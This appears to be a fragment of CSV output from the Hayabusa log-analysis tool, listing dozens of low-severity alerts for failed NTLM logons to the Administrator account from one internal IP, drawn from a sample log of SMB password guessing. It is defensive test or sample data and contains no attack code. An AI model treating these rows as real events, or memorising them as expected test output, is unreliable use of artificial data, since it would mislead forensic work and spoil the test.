+2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i3oGLwrCJXJOauf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1sxPrDYV3rr4pGJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Osysh2O2A3A2bN22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FsInW9EMJZU8FOrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ge8do8TM4GG1atMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w5GLbpVsAhGqCiq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8eQXeW1VpRU0ptMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhLosoA2parzTnW9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MCFTP4gVGEKFKuRI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALrDwJz2cta9fcXB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZZNXGw28osMQLjub | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wQzvMnwYuEQRO7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UloOAIgGuj6NecfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVSeLo2PRgGmf83Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SaCFO8CPFLuERugV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCwV1D4L5BDZSriK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QPhLQsM4R2ua4SxW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fwgp52JNi7xnTxpN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2GutBDenjweAluz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wflcgg5ebqu8hHGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jXaaYSU2pakw6IsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfJnBv3eA8wZttML | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOXSI0jPfbvW4dAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JW6aX5mNz7cETsl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVuJLXJzlVnDLT4Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtSwhwnApnPI9AkO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1peOkjbd1WXGEAAM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tbw3V9MtLIcxr65R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CEZ2v1f6t0luDj4D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R0omMppAFlFhE1mG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0jMvVN9eSeGW3zcN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnFNYabbO7IpbVku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KtyTTNdqVikZGYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DCChjnFv2hMXXwgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvIYRZSomaJYJOH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEirUFRscaOwTuAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwQgMM9H1oN4te9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JbGILYTcFwtYbDk1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5KzNsgWvyUhNEHd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGvwbOtP3A5eDKCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YZvtNNX511hIleST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJBRTeW6OQtNrt5u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hovgq99STVt2GzrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4kpT3gf0VCAVuVSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiB04AvkYp0PP3n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PPluKgaiT10oC35V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8nCOM9uUeqv9QBx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dSPrrNCh2FSWZKbI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLDnCjr4pSdKAMX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0UnmfB7lcXKEAvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogjMSxcUw7cF5dMa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75uB8ejsSV5CbagM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5MMHLnyrzBQxluHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QXLn6fpmR52RBAz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcdlrSUzcFNpaK5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJjiRO5rJzZ8XtqP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncBraDdG2htkHjXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lo9DNrL44Z2S2SYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QKcFiKC5QiIoHtxy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sqvq9GwuPCO15lUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XzgtJ3qUmkFiIY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1wc1Hjb4AK0Np1q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKYNy0JyxIlFusMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IrcKp13ut9M0pCi0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B3lJSH0r8iHAVhPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ju3lCbvbwvkIKsBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQOHcZeAKQG6wHhC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBPkgoKDLABqdSQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqj4xOCsJg1j3IIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhBIu6wUPHc3DZAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0fI1GhH5YTOHbNN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7mLOWiojillZNYH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37dknpwsl8j1WRWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gzVum7a21sQe3fMt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
